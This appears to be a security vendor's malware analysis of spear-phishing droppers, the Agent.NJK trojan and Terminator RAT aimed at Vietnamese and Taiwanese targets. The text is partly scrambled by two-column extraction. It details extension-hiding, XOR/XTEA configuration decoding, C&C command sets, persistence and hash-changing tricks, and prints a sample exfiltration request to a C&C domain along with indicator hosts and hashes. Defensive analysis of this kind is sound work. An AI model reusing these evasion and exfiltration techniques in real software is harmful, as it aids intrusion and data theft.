Did you say

Advanced Persistent Threats?

Did you say Advanced Persistent Threats?
Here we analyze four targeted attack tools with Taiwan and Vietnam
in their sights - but somehow linked together - and thereason why
they shouldn't be called advanced.
Figure 1: Targeted entities were located in Vietnam and Taiwan
Once in awhile we get to spend time analyzing malicious code that is
not as widespread or not as well-obfuscated as other threats we've
encountered in thepast. This article is about one such threat. We
decided to spend some time on this analysis because of interesting
strings in one of thecomponents referring to Vietnams Central Post
and Telecommunications Department. But before we delve into
thetopic lets first highlight some of thefindings:
Entities in Taiwan and theVietnam government are targeted
Observed attacker interaction
Evidence of anunidentified APT actor
Social engineering vector (no exploit code) with very credible
documents
Bad criminals: typos in configuration, naive cryptographic
implementation, weak code practices
Sophistication variability: from no obfuscation to hidden position
independent code, XOR encryption, XTEA encryption, stand-alone
re-usable components
Tailored infections: one threat doesn't persist, theother doesn't
do anything before areboot
Figure 2: Analyzed threats
You can see in theabove figure all themalware samples that this
article will cover. thefile received by thevictim is always thedropper
which we will cover shortly. Since they were carrying two different
threats thedropper hashes are not thesame but their functionality
is equivalent: therefore it is summarized as asingle threat and
1
Did you say Advanced Persistent Threats?

considered are-usable component in theattackers arsenal. We have

investigated two dropped threats, namely Agent.NJK and Terminator
RAT which also carries anembedded binary.

Good ol social engineering Figure 3: Appearance of thefiles

As we noticed from our telemetry data, themalicious software that thefile is anormal Word document, theexecutable displays
reaches its target through spear-phishing campaigns. thefirst theicon of aWord document.
dropper we analyzed came from thewebmail interface of
aVietnamese governmental institution. Using targeted emails Upon execution these droppers will decrypt their configuration
allows more chance of succeeding in theattack by using amore parameters using asimple one-byte key XOR-based cipher best
personalized and convincing message. It also narrows thedistribution described with some python code below. This configuration is stored
of themalicious files, giving them alonger shelf life since there is in thelast 32 bytes of thelast portable executable (PE) segment
less chance of their being found and analyzed by Anti-Virus (AV) of theexecutable. Inside this configuration is achecksum, some
companies. offsets and lengths of internal resources along with other seemingly
unused fields, as you will see in thestruct pictured below. ahard-
With knowledge of thecharacteristics of thefirst dropper, we were coded integer in thecode is compared with thechecksum in order
able to find arelated piece of malware in our collection. As mentioned to validate that configuration decryption worked. This checksum is
previously, they were carrying different threats but also had def xor _ decrypt(ciphertext, key): struct hidden _ segment _ data
adifferent filenames for i in range {
(len(ciphertext)): int checksum;
c = ciphertext[i] char delimiter;
Threat File name Translation if c: char unused[3];
Win32/TrojanProxy.Agent.NJK Bao cao ket qua.doc Vietnamese for if  c != 0xff: int pe _ file _ offset;
[137 spaces].exe "report theresults" c ^= key int pe _ file _ size;
if (c and c != 0xff): char unused[4];
Terminator RAT .exe Chinese for
ciphertext[i] = c int doc _ file _ offset;
(Win32/Protux.NAR) "inspection report"
return ciphertext int doc _ file _ size;
char xorkey;
char unused[2];
The presence of all those spaces is used to push the".exe" off char last;
thescreen and out of sight of thevictim. To further convince theuser };

Listing 1: XOR-based cipher Listing 2: Hidden configuration

2
Did you say Advanced Persistent Threats?

thesame in both cases. theoffset and length pairs are used to extract Nature of thefile Filename
files from inside itself into thefilesystem.
Malicious payload %TEMP%\~hCb58.tmp
The dropper first drops themain malicious binary and then aWord Word document %TEMP%\~hC29f.doc
document into theuser's temporary folder. Both files are decrypted Copy of itself %TEMP%\~hCb37.tmp
using thesame simple XOR technique except that themalicious Table 1: Dropped files
binary is prefixed with 5 bytes that are hard-coded in thedropper (MZ
header), and then XOR'ed with another hardcoded one-byte key. We This same copy of thedropper, once executed with command-line
believe this is done to avoid being detected by some AV. arguments, has adifferent operation. It will first sleep for one second,
leaving enough time for theoriginal dropper execution to terminate.
First, after theextraction, themalicious binary will be executed by Then it will remove this original file and copy thedecoy document
thedropper. thebehavior of theanalyzed binaries will be covered (~hC29f.doc) in its place, keeping theproper .doc extension. Finally,
later. thedropper will then copy itself using ahandle retrieved aShellExecuteW with theopen operation is run on thenewly
with GetModuleHandle. It will execute this fresh copy with some copied document in order to open theproper editor registered for this
command line arguments in order to clean up after itself: namely, file type.
thecurrent full path and filename of thedropper and thefull path and
filename of thedropped Word document. Finally, it will exit.

For example this is what ends up being run:

C:\Documents and settings\user\Local Settings\

Temp\~hCb37.tmp\
"C:\Documents and settings\user\Downloads\Bao cao ket
qua.doc[137 spaces].exe"\
"C:\Documents and settings\user\Local Settings\
Temp\~hC29f.doc"

Listing 3: Dropper executes theabove

Figure 4: Dropper operation

3
Did you say Advanced Persistent Threats?

All this work is done to effectively simulate theresult one would

expect when double clicking on aninnocuous Word document except
that in this case malicious code was executed first.

Figure 6: Taiwan decoy document

The combination of thespear-phishing, hiding thefile's extension,

awork-related file name and aMicrosoft Word style icon can be
pretty convincing for auser who had no proper security awareness
Figure 5: Vietnam decoy document
training or without proper desktop hardening and protection against
executables sent by email. theuse of these simple techniques is well
documented inside Mandiant's APT1 report. Notice that no software
vulnerabilities are exploited by criminals in order to get their malware
to run.

In thedropper there are two different techniques used to hide calls:

afunction that essentially re-implements GetProcAddress, called

4
Did you say Advanced Persistent Threats?
with hardcoded plaintext strings, and legitimate GetProcAddress
calls but using anobfuscated lpProcName (XOR 0x17 of every other
two chars). Interestingly, most of thecalls are not obfuscated. Again,
it feels like iterative AV evasion hard at work.
Aside from thefact that it seems easy to re-purpose, thedropper
doesn't strike us as aparticularly well written piece of code. There are
notorious anti-patterns present in thecodebase like aGod object and
some copy-and-paste programming (although to be fair this could be
theresult of compiler optimization).
Figure 7: Vietnam document metadata Figure 8: Taiwan document metadata
Win32/TrojanProxy.Agent.NJK
The first dropped binary that we analyzed is what our engine detects
as Win32/TrojanProxy.Agent.NJK. This is aVisual C++ trojan that
communicates over HTTP with hard-coded Command and Control (C&C)
servers. In thesample we analyzed, thethree servers supported by
thetrojan configuration were in fact pointing to thesame domain
name vietnam.vnptnet.info, but using different ports (80, 443 and
5050).
The malware will adjust its TCP timeout for HTTP requests to 15
minutes and then loop forever trying to contact theC&C domain via
thethree ports in configuration. aninteresting fact about this threat
is its lack of persistence, meaning that it will be executed only once
and will not be relaunched if thesystem reboots. There is no obvious
attempt at obfuscation and simply running strings on thebinary
reveals agreat deal about thesample and its capabilities.
In its attempt to contact theC&C themalware will send several pieces
of information about thehost in aGET request and use aspecific
User-Agent string. theuser data is in a105 bytes array, encoded in
hexadecimal and sent in thepath component of theGET request.
It contains information such as: astring we believe is used to track
attack campaigns; theinternal IP address of thehost; theComputer
Name; aWindows Version ID; and thecurrent username executing
theprocess. No encryption is applied to this data. Below is theexact
format of this payload.
5
Did you say Advanced Persistent Threats?
Figure 9: Initial payload sent by the client
Once encoded requests look like theone below:
GET /4350542D4E4D43000000000000000000000000000000000031393
22E3136382E3136362E31343500555345522D3938394243313335353500
0000000000000000000000000000000107757365720000000000000000
0000000000000000000000000000000000000000 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows
NT 5.0; .NET CLR 1.1.9527)
Host: vietnam.vnptnet.info
Listing 4: Sample HTTP GET Request
The server will reply with conventional HTTP server headers except
that it adds anAccept header field with thevalue "x-wav/y-img"
(something seen before). thetrojan will not process theserver's answer
unless this string is present in that header. Note that Accept headers
are usually part of theclient HTTP request and not server responses.
The C&C commands are sent unencrypted and are always 796 bytes
long. thefirst Integer in thecommand data is thecommand ID.
thesupported commands are:
Command id Command description
1000 The command-line is executed by thevictim and
stdout and stderr are sent back to theC&C
2000 The victim replies "\r\n\r\nRecieve KeepAlive
Commond\r\n\r\n" (including thetypos...)
3004 Download afile to thevictim's computer.
Filename is specified in thecommand data.
3005 Upload afile to theC&C. anoffset argument can
be specified so as to upload only apart of thefile.
3006 Change thecurrent directory to theone specified
in thecommand data.
3007 Set thetime (in ms) for theWaitForSingleObject
function of acommand line execution (command
id 1000)
3008 Sends to C&C information about thedrives' total
size, free space, letters and names.
3009 Lists thefiles in aspecified directory. Filename,
last modification date and sizes are sent.
3010 Delete agiven file by name
3011 Spawn aprocess with thecommand-line given in
command data. Nothing sent back to C&C.
Table 2: Agent.NJK supported commands
6
Did you say Advanced Persistent Threats?

Very simple, nothing fancy, and thecode doesn't reveal much about are thehighlights of theinteraction that we have observed on
theattackers intentions. Unfortunately, all that is left to thetrojan thesystem.
operator so we can't draw any conclusions about theoperation with
only themalware sample to work from. Rather than being simply 1. client <-
naive, this is rather stealthy. But then again, some funky strings are command id/name: 3008/Get Drives Infos
also present in thebinary like "I want to go to theGREAT WALL, inner client ->
Mongolia very much" and some unused proxy credentials (somnuek.
label: C:
bu / 044253516). These proxy credentials are not referred to anywhere
type: 3 (DEVICE _ FIXED)
in thecode which leads us to think that this is afeature supported by
free: 7828
themalware that was compiled out when this threat was assembled
total: 10228
for this campaign.
label: D:(8
The hardcoded campaign string (CPT-NMC) sent by theclient type: 5 (DEVICE _ CDROM)
further confirms thetargeted nature of theattack. CPT stands for free: 0
Central Post and Telecommunications Department, adepartment total: 589
of theVietnamese government. We can also notice that thetop-level
2. client <-
domain used for C&C (vnptnet.info) is strikingly similar to Vietnam's
command id/name: 1000/ExecuteCommandLine executed:
vnpt.vn which is Vietnam Posts and Telecommunications Group
netsta -ano
and probably chosen as ameans of camouflage within Intrusion
Detection System (IDS) logs. Finally, thedecoy document writes client ->
about telecoms and testing and carries some network diagrams,

'netsta' is not recognized as aninternal or
which all seems very credible to apotential victim. Looks like this
external command, operable program or batch file.
campaign was aimed at Vietnam's CPT and we know Vietnam's officials
have been under targeted attack this year. 3. client <-
command id/name: 1000/ExecuteCommandLine executed:
We're up all night to get lucky netstat -ano

We saw anoperator interact with asystem we infected and client ->

monitored. We even got some evidence of manual operation. Here ...

7
Did you say Advanced Persistent Threats?

and then other commands:

4. set
5. dir C:\DOCUME~1\user\recent /od
6. dir C:\DOCUME~1\user\desktop
7. dir c:\
and then it stopped

Listing 5: Agent.NJK attacker interactions

These are all reconnaissance operations: netstat to view current

network interactions, drive enumeration, set to view thecurrent
environment variables and then some file locations were explored.
Something that leads us to think that this operation is not automated
is thetypo highlighted at interaction (2) abehavior weve seen
before. netsta was written instead of netstat, leading to the'not
recognized' error sent to theserver. We see no good reason to
fake such anoperator error and this is why we think we caught
alegitimate typo. Here is ascreen capture of some of thecontent of
theinteractions that was left out of theabove highlights. As you can
see, all this information is sent in plain text over thenetwork.

Figure 9: Initial payload sent by the client

8
Did you say Advanced Persistent Threats?

In theabove screenshot we notice that theserver replied with thefull

HTTP headers in thepacket highlighted by (1) and with aContent-
Length of 796 bytes just like any C&C commands. However, theserver
doesn't send these bytes in that packet, so theclient hangs waiting
for those bytes to come in. After a30 minute delay theserver just
sent aTCP reset (RST) to close theconnection. theclient was never
allowed again onto theserver, getting instantaneous TCP resets for
any connection attempts on any of thethree ports configured as you
can see in thescreenshot below.

Figure 12: No response, various ports retried (80, 443, 5050)

Figure 11: Agent.NJK - end of the network connection

9
Did you say Advanced Persistent Threats?
This is another behavior that reveals alittle bit more information
about theway they operate. Once thevictim computer is flagged as
not of interest to theoperators, it is actively blocked from theC&C at
theTCP layer rather than at theapplication layer (HTTP).
The non-persistence characteristic of theattack strengthens
thehypothesis that it is targeted since theattackers will leave little
trace and little network activity if they don't install anadditional
component through thetrojan. atypical attack scenario with this
tool would then be: figure out potential victims in anorganization;
send spear-phishing emails; wait; get connections from thetrojan;
and quickly and interactively investigate thecomputers for
thesensitive data you are looking for. If thedata isn't there pull
theplug, and if it is there install anadditional component through
thecommands for file download (3004) and file execution(3011).
Without full incident investigation forensics, which we are not in
aposition to perform, being anAV vendor rather than anincident
response team, there is little we can do to help victims of this threat
know what happened on their systems except to document how it
works and hope that this information will be useful.
Terminator RAT (aka FAKEM RAT)
When we started analyzing this threat, our product detected it as
Win32/Protux.NAR. When we reverse engineered thecryptographic
protocol of thenetwork communication with theC&C we found out
that thethreat was documented by malware.lu and Trend Micro as
Terminator RAT or FAKEM RAT, but that our sample diverged alot
from theone they analyzed, and carried anadditional binary. Last
month, FireEye released ananalysis of asample very similar to this one but
thehashes are still different. In this article, we will focus on giving
additional details of thethreat and we encourage you to refer to these
past articles for further background information.
We first found out that what we called Win32/Protux.NAR was
in fact theTerminator RAT when we looked at thenetwork
encryption and stumbled on malware.lus report titled APT1: technical
backstage. Although their reference to theAPT1 group is challenged
by thecommunity, we definitely have here aprivate Trojan that has
been re-used on several campaigns by thesame group. Compared
with theAgent.NJK trojan, here thesophistication level is cranked up
one notch. First, theconfiguration and strings are encrypted using
aslightly modified implementation of XTEA. XTEA uses a128 bit key
and work on 64 bit blocks.
10
Did you say Advanced Persistent Threats?

The implementation is naive since it uses theworst block cipher mode

of operation as you will see in thescreenshots below. 64 bit blocks of
zeros always

Figure 14: Sample ciphertext at 0x404198 with obvious patterns

Figure 15: Plaintext at 0x404198 after decryption

With proper use of block chaining figure 14 wouldnt have carried any
discernable pattern. Heres theconfiguration of our sample before
decryption:

Figure 16:
Configuration
and strings
before decryption

Figure 13: Mandatory cryptographic loop screenshot

11
Did you say Advanced Persistent Threats?
(1) is theXTEA key, (2) shows two ports (9000, 9090) and some
other unencrypted material we couldn't figure out, (3) shows more
unencrypted strings related to theway themalware operates but
with null bytes injected in them (the strings are re-assembled before
being used in thecode).
Figure 17: Decrypted configuration and strings
(1) is thefolder where themalware is installed (in %APPDATA%), (2)
marks thefilenames given to thecopied and extracted files, (3) shows
theC&C's domain name, (4) is thename of thePE image resource
directory entry where further payloads are hidden (an executable
file and position independent code) and (5) shows theregistry keys
modified for persistence.
Next, it will load and install in memory theoffsets to some functions
that are not declared in thePE import table. To do so they re-
implemented anequivalent of GetProcAddress just like they did
in theTrojanProxy.Agent.NJK threat. However this time theoriginal
dll and function name strings are neither encrypted nor obfuscated
and theoffsets are installed in fixed memory locations in thedata
segment so they are easy to cross-reference for further analysis of
thethreat. They could have made thejob harder but they didn't.
On its first run, there is no networked malicious behavior. It will
create athread that will change thepath of theStartup Folder in
registry (to %APP _ DATA%\2019), copy theexisting files from theold
Startup Folder to thenew one, move itself with theMOVEFILE _
DELAY _ UNTIL _ REBOOT flag to thenew Startup Folder under
thename "svchost .exe", decrypt and extract aPE from within itself in
theStartup Folder with thename "winslogon.ini" (which we will refer
to as theproxy tunnel component), do amove with theMOVEFILE _
DELAY _ UNTIL _ REBOOT flag to rename it to "winslogon.exe" and
then quit. This is summarized below:
12
Did you say Advanced Persistent Threats?

As you can see, there is also code to handle failure in theStartup

Folder registry changes. thefallbackPersist call will copy itself to
thecurrent Startup Folder with thename wuauclt.exe and then exit.
Depending on thelocation of that folder this will either delay another
attempt at modifying theregistry on thenext reboot - until someone
with proper privileges to change this registry settings logs in - or it
will trigger themain payload which we will describe shortly.

Always moving
As you saw this threat relies heavily on theMOVEFILE _ DELAY _
UNTIL _ REBOOT flag of theMoveFile() function. This serves as
asimple way to relocate themalware executable even if thefile is
currently executing. It may also prevent triggering heuristics and
sandbox technologies. That said, those delayed moves don't stop
there. On each subsequent execution of thebinary alittle evasion
maneuver is performed. First, it will copy itself into atemporary
location (GetTempPath() + "~7ti2"). Then, arandom number of
random bytes are appended to theend of thefile. Lastly, amove
with theMOVEFILE _ DELAY _ UNTIL _ REBOOT and MOVEFILE _
REPLACE _ EXISTING flags will be performed to replace thecurrently
running binary on reboot. This implies that thehash will change on
every reboot without affecting proper operation.

All of which can be visually represented by thefollowing diagram:

Figure 18: Persistence code with a branch to deal with failure

13
Did you say Advanced Persistent Threats?

and strings and thread creation as on its first run, but then thethread
takes aseparate branch based on thefact that it is run from afolder
which contains the"App" string. In that branch it will first sleep for 5
minutes and then will perform thecopy/move operation described
earlier, and then reach its main payload.

That payload will allocate memory, copy thePE image resource

directory entry with id 0x8A under theACCELORATOR resource
directory into this newly allocated memory, and apply anXOR with
asingle byte key (0x32) to encrypt it. This last encryption operation
seems strange since it could have already been pre-encrypted that
way in theresource entry, but this wasn't done for reasons still
unknown to us.

As aside note, ACCELORATOR appears to be aclever typo of

ACCELERATOR, aterm used to describe keystrokes defined in
applications and usually stored in PE resources.

This allocated memory is actually executable code. We will refer

to this as position-independent code from this point on. afew
more things happen before moving into this newly extracted code
Figure 19: Terminator's evasion maneuver
segment: resolve thecurrent host's IP, XOR encrypt and copy that IP
and ahardcoded port 8000 at specific offsets in that code (you will
understand why later) and then add some 32 bytes of XOR'ed random.
Main payload All XOR operations are performed with thesame 0x32 single byte key.

After areboot, when Windows runs every executable in theStartup

Folder, thetwo binaries "svchost .exe" (the main component) and
winslogon.exe (the proxy tunnel component) will be executed.
themain component performs thesame decryption of configuration

14
Did you say Advanced Persistent Threats?

The position-independent code makes some unconventional use of

theregisters so this leads us to believe that this was written directly
in assembly language. First, thememory segment itself will be XOR
decrypted with asingle byte key (0x32). Then it will load theaddresses
for all thefunctions it will use later. It does so by re-implementing
LoadLibrary and GetProcAddress. However instead of loading
thefunction names as strings, it uses atable of pre-computed ROR
hashes for each function. thecode regenerates thehash for each
function in theDLL and when they match, thehash is replaced by
thefunction's address in thetable. This technique is quite common
and has been documented before. On theother side, thelibrary name is
stored as astring.

Figure 20: Position independent code loading and execution

Figure 21: kernel32.dll hashes to lookup Figure 22: After loading function addresses
15
Did you say Advanced Persistent Threats?
The code then creates anEvent named 'sxX5{c4' with
theCreateEvent function and uses it as amutex to ensure that
only one copy of itself will execute at any one time. Now, moving on
to themain payload, we reach aloop on all C&Cs in its config. Two
of these are hardcoded and are thesame as theone in theXTEA
encrypted config, as mentioned earlier. thethird is theone injected
earlier which points to thehost's current IP and hardcoded port
8000 (as explained later). It will loop forever on all three and will
sleep 30 seconds if it can't connect. Upon asuccessful connection,
themalware will send information about theclient to theC&C in
a1024 byte packet. theformat is pictured below.
Figure 23: Position independent code loading and execution
The header is made up of therandom data that was previously copied
in from themain component with every two bytes padded with
thesame pattern. Username and Computer name are strings 128
bytes long and thesystem's codepage is included as aninteger. There
are also some hardcoded integers: two integers of value 0x130, 0x0
(1) and aninteger of value 0x30005 (2). Both of these are identical to
those observed by FireEye. There is also some string value that could
be thecampaign ID (3). Unlike theother unknown values this one is
not embedded in thecode but in theconfiguration, and there is some
attempt at obfuscating theaccess to thevariable, which in our case
was thestring "wet". therest of thepacket is empty (bytes 321 to 1024)
except for thelast byte where there is anewline character ("\n").
Figure 24: Position independent code loading and execution
The communications are encrypted using asimple scheme: each byte
of theplaintext is XOR'ed with every character in thekey and then
rotated to theright by 3 (ROR'ed) after each XOR operation. thekey
is static and is "YHCRA" ("ARCHY" backwards). This is easier to explain
with code:
16
Did you say Advanced Persistent Threats?

def encrypt(pt): commands. Command prompt, file manager, host information,

key = "ARCHY"[::-1] process management, registry management, screen captures, service
ct = "" management, password stealing, and file upload, were all capabilities
for c in pt: that they observed.
p = ord(c)
for k in key: Even though we had avery similar threat to hand theC&C domains
p = p ^ ord(k) extracted from configuration were slightly different.
p = ror(p, 3)
ct += chr(p) Domain IP Port
return ct "catlovers.25u.com" (1) doesn't resolve 9000
dryboxs.4dq.com 123.51.208.142 9090
Listing 6: Terminator network encryption
localhost depends (2) 8000
Once decrypted, theserver traffic contains acommand ID in thefirst
The first domain configured (1) contains aspace before thenull-
integer of the1024 byte payload returned. Well described by Trend
byte string terminator which means that theDNS resolver is
Micro, thecommands supported by this RAT are thefollowing:
unable to resolve it. It is thus never used by themalware. As we
said earlier, thethird domain is looked up using gethostname and
Command id Command description
gethostbyname (2) and then copied into theposition independent
0x211 Execute code attached in command data code before it is launched. 25u.com and 4dq.com are both operated
0x212 Reconnect to receive data by thechangeip.com dynamic DNS service operated in theUS. IP
0x213 Sleep, close socket and reconnect 123.51.208.142 is Taiwan based.
0x214 Exit
Here's atable that highlights thedifferences observed between
Table 3: Terminator supported commands
thevarious observed campaigns:

As you can see, these are again very generic, meaning that
themalware's true goals and capabilities are hidden when doing
static analysis. However Trend Micro was able to observe attackers
and documented some of thecode that attackers sent in their 0x211

17
Did you say Advanced Persistent Threats?

Trend Micros analysis FireEyes analysis ESETs analysis

Activity Since 2009 June 2013 June 2013
Campaign undisclosed zjz1020 wet
Distribution Word or Excel documents with exploit Word or Excel documents with exploit Social engineering
code code
Installation Registry Run entry Modified Startup Folder Modified Startup Folder
XTEA key None used 0x3c78 0x9ac9
Network traffic Fake header in first 32 bytes Repeated pattern in first 32 bytes Random bytes with padding intermixed
in thefirst 32 bytes
Proxy tunnel No mention of this component Stand-alone component for exfiltration Stand-alone component for exfiltration
through corporate proxy through corporate proxy
Proxy filename None sss.exe winlogon.ini then winnlogon.exe
C&C vcvcvcvc.dyndns.org liumingzhen.zapto.org "catlovers.25u.com[space]" port 9000
zjhao.dtdns.net liumingzhen.myftp.org (broken)
avira.suroot.com catlovers.25u.com dryboxs.4dq.com port 9090
*.googmail.com localhost port 8000 localhost port 8000 (see proxy tunnel)
*.yourturbe.org
freeavg.sytes.net
IPs Varied 123.51.208.69 123.51.208.142 (same /24)
DDNS Provider DynDNS, DtDNS, noip.com noip.com changeip.com

Table 4: Summary of thedifferences in thecampaign

18
Did you say Advanced Persistent Threats?

Summary of similarities
Same network encryption algorithm ("ARCHY"[::-1] xor/ror3)
Same 1024 byte network payload
Same commands (0x211, etc.)
Most C&C rely on dynamic DNS
Operated from thesame /24 network owned by aTaiwanese ISP

This threat lacks acoherent design and seems to be iteratively

modified to accomplish theattackers agenda on thefly. thepresence
of 3 different encryption mechanisms and two different techniques
to load function addresses tends to justify this assumption.
Furthermore, using XTEA encryption for theC&C information while
also showing them in plaintext in theposition independent code
seems like amistake. Finally some functions are awkwardly patched
to add features like theencryption / decryption functions shown
below. anon / off (1) flag is used to determine if thefunction is calling
theXTEA encryption (2) or some XOR with afixed one byte key (3)
reminding software engineers of thecoding-by-exception anti-pattern.

Figure 25: Strange cryptographic code paths

Having various analyses on thesame threat is interesting because

we can see what gets re-purposed when acampaign changes. In
thecurrent Terminator RAT case we can see that both malware
components and infrastructure components were altered. XTEA keys,
network protocol headers, and thedropped proxy tunnel component
filename were changed in thebinary itself while DDNS providers
and IP addresses were changed on theinfrastructure side. Its also

19
Did you say Advanced Persistent Threats?
interesting to see that theuse of ACCELORATOR name as thehidden
PE resource or thenetwork protocol encryption key are things that
haven't changed between campaigns. What conclusions can be
drawn from this observation is anexercise left to thereader.
Proxy tunnel component
Again, comprehensively described by FireEye as sss.exe, this component
is present for theeventualities where thetarget's network doesn't
allow anoutgoing network connection to reach theC&C servers
directly. In anutshell, it binds to thelocal port 8000 and will tunnel
through anything that connects to it via thelegitimate proxy
configured on thecomputer. It uses theHTTP CONNECT verb to get
anend-to-end tunnel up to theC&C.
In our investigation, thefile was named winslogon.exe and had
adifferent hash, solely because theconfiguration (and maybe
thecode) was different. We also noticed thepresence of anencrypted
log file (hardcoded to %TEMP%\~DF3bbs.tmp) which can be decrypted
with asingle byte key XOR (0xAB) as shown by thecode below.
key = 0xAB
ct = open("logfile", "rb").read()
pt = "".join([chr(ord(e) ^ key) for e in ct])
print pt
Listing 7: Decrypt proxy tunnel component logs
It uses anEvent Object named with thenon-printable character
represented by 0x13 to ensure that only one instance of theproxy is
running. Additionally, as with theTerminator / FakeM RAT threat,
thebinary will perform alittle dance meaning that on each execution
it will copy itself into atemporary location (GetTempPath() + "~7ti3"),
append arandom number of random bytes to theend of thefile,
then add theXTEA encrypted configuration. Lastly, amove with
theMOVEFILE _ DELAY _ UNTIL _ REBOOT and MOVEFILE _
REPLACE _ EXISTING flags will be performed to replace thecurrently
running binary. So thehash of thefile will change but behavior and
functionality stays intact. Finally, we observed adifferent location for
thestored proxy configuration than theone FireEye reported. In our
case it was stored in %Windir%\Proxy.
The addition of this component as astand-alone to augment
Terminator RAT's exfiltration capabilities is very interesting as it could
be easily re-used. Additionally, aloosely coupled component with no
malicious behavior (although suspicious) packaged with aRAT whose
malicious payload is well hidden in position-independent shellcode
supporting very generic commands, makes thestatic analysis of
thethreat quite difficult and leaves everything to theimagination
about what it is that theattackers are after.
There is no ain this APT
Indeed, none of these threats were packed to thwart reverse-
engineering, no exploit code was used and there were several
observations of poor software development and operational
practices: sloppy coding, bad cryptography, operator errors, leakage
of unused proxy credentials and even mistakes in configuration that
rendered aC&C domain completely useless. This is not advanced.
20
Did you say Advanced Persistent Threats?

However, as long as these less sophisticated attacks are still Win32/TrojanDropper.Small.NNK

successful they will continue, because they are obviously cheaper to 5  8e1dfa7ace03a408d2b20c1fab6e127acbdc71f492366622cd52064844
perform than themore complex ones. 43ed7
3 f58a0ea8958c5bf88aa9cfcefe457393f0a96bba9f05f301ba6a15b65d
We can see two [A]PT strains at work here. One with no awhere 5b64a
we have low-complexity low-cost attacks where manual operators
are thrown at several targeted campaigns, using simple malware Win32/TrojanProxy.Agent.NJK
modified just enough to avoid detection. Then, on theother hand, 54c5517541187165fd9720dfe8cff67498d912d189d649cc652d8b113bae
groups seem to exist that truly deserve theaepithet A-teams, you 8802
might say. (Note that we avoided thecyberwar kind of APT.)
Win32/Protux.NAR (Terminator RAT)
So, before issuing your press-release about getting popped by anAPT 4
 25a919cb5803ce8fabb316f5e1be611f88f5c3813fffd2b40f2369eb70
group, at least make sure that you are not simply overly exposed to 74da9
simplistic B-list attacks. User awareness training and locked-down
group policies incorporating thefiltering of executables in emails Win32/Protux.NAR (Terminator RAT) embedded proxy tunnel
would have mitigated or prevented thethreats described in this post. component
Is your company at least taking these steps? Ba6cc9fbcb3d806fefb4d0f2f6d1c04b81316593dfe926b4477ca841ac17
354e2
Author: Olivier Bilodeau
Contributors: Mathieu Lavoie, Marc-Etienne M. Lveill

21